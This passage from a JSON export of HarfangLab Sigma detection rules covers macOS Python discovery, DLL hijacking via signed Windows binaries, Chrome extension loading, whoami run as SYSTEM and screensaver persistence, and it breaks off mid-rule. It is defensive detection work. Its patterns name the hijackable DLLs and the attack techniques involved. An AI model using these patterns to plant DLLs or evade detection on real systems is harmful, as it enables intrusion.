"content": "title: User Directory Discovered via Python\nid: 7720b1f7-b754-4828-9b33-cf1ea6a52a8e\ndescription: |\n Detects the discovery of a user directory via the python3 os.confstr function.\n Attackers may use it during the discovery phase of an attack to retrieve a user directory.\n It is recommended to investigate the python script executed and to check for other suspicious activity by the parent process.\nreferences:\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\n - https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html\n - https://www.manpagez.com/man/3/confstr/\n - https://attack.mitre.org/techniques/T1083/\ndate: 2022/12/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/usr/bin/python'\n - '/usr/bin/python2'\n - '/usr/bin/python3'\n # _CS_DARWIN_USER_DIR\n CommandLine|contains|all:\n - '-c'\n - 'os.confstr(65536)'\n ParentImage|contains: '?'\n\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7720b1f7-b754-4828-9b33-cf1ea6a52a8e",
"rule_name": "User Directory Discovered via Python",
"rule_description": "Detects the discovery of a user directory via the python3 os.confstr function.\nAttackers may use it during the discovery phase of an attack to retrieve a user directory.\nIt is recommended to investigate the python script executed and to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7733a4eb-7bdd-452b-a739-25c96d114aa5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587590Z",
"creation_date": "2026-03-23T11:45:34.587593Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587601Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsdbutil.yml",
"content": "title: DLL Hijacking via dsDbUtil.exe\nid: 7733a4eb-7bdd-452b-a739-25c96d114aa5\ndescription: |\n Detects potential Windows DLL Hijacking via dsDbUtil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsDbUtil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dsrole.dll'\n - '\\esent.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\srvcli.dll'\n - '\\vssapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7733a4eb-7bdd-452b-a739-25c96d114aa5",
"rule_name": "DLL Hijacking via dsDbUtil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsDbUtil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "773cd711-d0cd-4d90-aa4d-7fa3addbe709",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076419Z",
"creation_date": "2026-03-23T11:45:34.076421Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076425Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/",
"https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extensions_load_linux.yml",
"content": "title: Suspicious Extensions Loaded by Chrome-based Browser (Linux)\nid: 773cd711-d0cd-4d90-aa4d-7fa3addbe709\ndescription: |\n Detects a Chrome-based browser launched with a specific argument that allows extensions to be loaded from a specified folder.\n Adversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\n It is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/\n - https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/30\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.SensitiveInformation\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n CommandLine|re: '--load-extension=[^ ]'\n ProcessParentImage:\n - '/usr/bin/xfce4-panel'\n - '/usr/bin/gnome-shell'\n - '/usr/bin/kde-open'\n - '/usr/bin/plasmashell'\n - '/usr/bin/cinnamon'\n\n filter_expected_folder:\n CommandLine|contains: '--load-extension=/usr/share/chromium/extensions/'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "773cd711-d0cd-4d90-aa4d-7fa3addbe709",
"rule_name": "Suspicious Extensions Loaded by Chrome-based Browser (Linux)",
"rule_description": "Detects a Chrome-based browser launched with a specific argument that allows extensions to be loaded from a specified folder.\nAdversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\nIt is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\n",
"rule_creation_date": "2024-10-30",
"rule_modified_date": "2025-02-06",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "77575317-f87a-49a1-b295-f2a7a23f75d4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606040Z",
"creation_date": "2026-03-23T11:45:34.606044Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606051Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/operation-doubletap",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_whoami_windows_system.yml",
"content": "title: Whoami Execution by System\nid: 77575317-f87a-49a1-b295-f2a7a23f75d4\ndescription: |\n Detects the execution of whoami.exe by the SYSTEM account.\n This command is often used by attackers during the discovery phase.\n This command being executed by the SYSTEM account may be related to an ongoing Local Privilege Escalation (LPE) vulnerability exploitation.\n It is recommended to investigate the ancestors of the whoami process to determine if they are either linked with malicious processes, the result of a successful elevation of privileges or a legitimate administrative or applicative action.\nreferences:\n - https://www.mandiant.com/resources/blog/operation-doubletap\n - https://attack.mitre.org/techniques/T1033/\ndate: 2023/12/15\nmodified: 2025/11/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n # whoami /groups\n - attack.t1069\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\whoami.exe'\n # Renamed binaries\n - OriginalFileName: 'whoami.exe'\n\n selection_system:\n IntegrityLevel: 'System'\n ParentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Program Files\\\\*\\\\*.exe'\n - '?:\\Program Files (x86)\\\\*\\\\*.exe'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '?:\\Program Files\\\\*\\\\*.exe'\n - '?:\\Program Files (x86)\\\\*\\\\*.exe'\n # IBM i Access Client Solutions\n - '*\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '*\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '*\\ArcGIS\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '*\\ArcGIS\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n - '*\\BMC Software\\Client Management\\Client\\bin\\mtxopswatproxy.exe'\n - '?:\\wamp64\\bin\\apache\\apache?.?.??\\bin\\httpd.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n - 
'?:\\Windows\\Temp\\is-?????.tmp\\WinMerge-*-x64-Setup.tmp'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Program Files (x86)\\Archimed\\Syracuse\\\\*\\Bin\\Communication\\Archimed.SyracuseIls.FileProviderService.exe'\n - '?:\\Program Files (x86)\\Archimed\\Syracuse\\\\*\\Bin\\Core\\Services\\Archimed.TaskSchedulerService.exe'\n - '?:\\U2\\unishared\\unirpc\\unirpcd.exe'\n - '?:\\U2\\UV\\bin\\uvservice.exe'\n - '?:\\Program Files (x86)\\Trend Micro\\SupportConnector\\SupportConnector.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe'\n - '?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptservice.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe'\n - '?:\\Program Files\\Common Files\\Acronis\\Agent\\bin\\adp-agent.exe'\n - '?:\\Program Files\\Quest\\KACE\\konea.exe'\n - '?:\\Program Files\\APC\\PowerChute\\jre_x64\\bin\\java.exe'\n - '?:\\Program Files (x86)\\F-Secure\\PSB\\fshoster32.exe'\n\n exclusion_commandline:\n CommandLine: 'whoami /user /fo list'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n exclusion_stormshield:\n CurrentDirectory: '?:\\Program Files\\Stormshield\\Stormshield SSL VPN Client\\scripts\\'\n\n exclusion_tivoli:\n - ParentImage: '?:\\IBM\\ITM\\TMAITM6_x64\\\\*'\n - CurrentDirectory: '?:\\IBM\\ITM\\TMAITM6_x64\\'\n\n exclusion_openedge:\n CommandLine: '?:\\Windows\\System32\\whoami.exe /USER /NH'\n Ancestors|contains|all:\n - '\\bin\\admsrvc.exe|'\n - '\\jre\\bin\\java.exe|'\n\n exclusion_intune:\n ParentImage: '?:\\Windows\\System32\\msiexec.exe'\n CurrentDirectory: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\'\n\n exclusion_serviceportalagent:\n ParentImage: 
'?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\app-*\\emulator\\MmrAgent.NetFxEmulator.exe'\n GrandparentImage: '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\app-*\\ServicePortalAgent.exe'\n\n exclusion_azure:\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ParentCommandLine|contains|all:\n - '-Command & { whoami;ipmo '\n - '?:\\Program Files\\Microsoft Azure AD Connect Health Agent\\Modules\\AdHealthConfiguration\\AdHealthConfiguration.psd1'\n - '; Test-AzureADConnectHealthConnectivity -Role Sync'\n\n exclusion_microsoft:\n ProcessParentOriginalFileName: 'MmrAgent.NetFxEmulator.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_schedule:\n - GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\Windows\\System32\\taskeng.exe'\n - ProcessParentGrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\Windows\\System32\\taskeng.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "77575317-f87a-49a1-b295-f2a7a23f75d4",
"rule_name": "Whoami Execution by System",
"rule_description": "Detects the execution of whoami.exe by the SYSTEM account.\nThis command is often used by attackers during the discovery phase.\nThis command being executed by the SYSTEM account may be related to an ongoing Local Privilege Escalation (LPE) vulnerability exploitation.\nIt is recommended to investigate the ancestors of the whoami process to determine whether they are linked to malicious processes, the result of a successful elevation of privileges, or a legitimate administrative or application action.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-11-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "77632f65-c971-408e-a7c3-eea122b534e2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590938Z",
"creation_date": "2026-03-23T11:45:34.590942Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590949Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_redircmp.yml",
"content": "title: DLL Hijacking via redircmp.exe\nid: 77632f65-c971-408e-a7c3-eea122b534e2\ndescription: |\n Detects potential Windows DLL Hijacking via redircmp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'redircmp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "77632f65-c971-408e-a7c3-eea122b534e2",
"rule_name": "DLL Hijacking via redircmp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via redircmp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7793d0ef-0704-4067-8070-87daf4186792",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075470Z",
"creation_date": "2026-03-23T11:45:34.075472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075476Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/saving-your-access-d562bf5bf90b",
"https://attack.mitre.org/techniques/T1546/002/"
],
"name": "t1546_0002_screensaver_persistence_execution.yml",
"content": "title: Suspicious Process Execution via ScreenSaverEngine\nid: 7793d0ef-0704-4067-8070-87daf4186792\ndescription: |\n Detects the execution of a suspicious process by the screen saver engine.\n ScreenSaverEngine can be manipulated by adversaries to execute arbitrary commands when the screensaver is activated.\n It is recommended to check the legitimacy of the process by analyzing the process behavior.\nreferences:\n - https://posts.specterops.io/saving-your-access-d562bf5bf90b\n - https://attack.mitre.org/techniques/T1546/002/\ndate: 2024/07/23\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessParentImage|endswith: '\\ScreenSaverEngine'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7793d0ef-0704-4067-8070-87daf4186792",
"rule_name": "Suspicious Process Execution via ScreenSaverEngine",
"rule_description": "Detects the execution of a suspicious process by the screen saver engine.\nScreenSaverEngine can be manipulated by adversaries to execute arbitrary commands when the screensaver is activated.\nIt is recommended to check the legitimacy of the process by analyzing the process behavior.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-01-28",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7795856c-9d2d-4fdb-be8d-b49f4200f515",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593182Z",
"creation_date": "2026-03-23T11:45:34.593185Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593193Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_agentactivationruntimestarter.yml",
"content": "title: DLL Hijacking via agentactivationruntimestarter.exe\nid: 7795856c-9d2d-4fdb-be8d-b49f4200f515\ndescription: |\n Detects potential Windows DLL Hijacking via agentactivationruntimestarter.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'agentactivationruntimestarter.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msvcp110_win.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7795856c-9d2d-4fdb-be8d-b49f4200f515",
"rule_name": "DLL Hijacking via agentactivationruntimestarter.exe",
"rule_description": "Detects potential Windows DLL Hijacking via agentactivationruntimestarter.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "77fd5223-a8d4-4a30-9c54-4ef3605b960b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072331Z",
"creation_date": "2026-03-23T11:45:34.072334Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072338Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_explorer_suspicious_dll.yml",
"content": "title: Phantom DLL Hijacking via explorer.exe\nid: 77fd5223-a8d4-4a30-9c54-4ef3605b960b\ndescription: |\n Detects a suspicious DLL loaded by the explorer process from the Windows root folder.\n Everytime explorer.exe is started, non-existing DLL files are loaded from the Windows root folder.\n Adversaries may execute their own malicious payloads by planting a DLL in \"C:\\Windows\" path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/07/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith:\n - '?:\\Windows\\AEPIC.dll'\n - '?:\\Windows\\apphelp.dll'\n - '?:\\Windows\\CoreMessaging.dll'\n - '?:\\Windows\\dwmapi.dll'\n - '?:\\Windows\\dxgi.dll'\n - '?:\\Windows\\edputil.dll'\n - '?:\\Windows\\iertutil.dll'\n - '?:\\Windows\\imageres.dll'\n - '?:\\Windows\\IPHLPAPI.DLL'\n - '?:\\Windows\\MsftEdit.dll'\n - '?:\\Windows\\netutils.dll'\n - 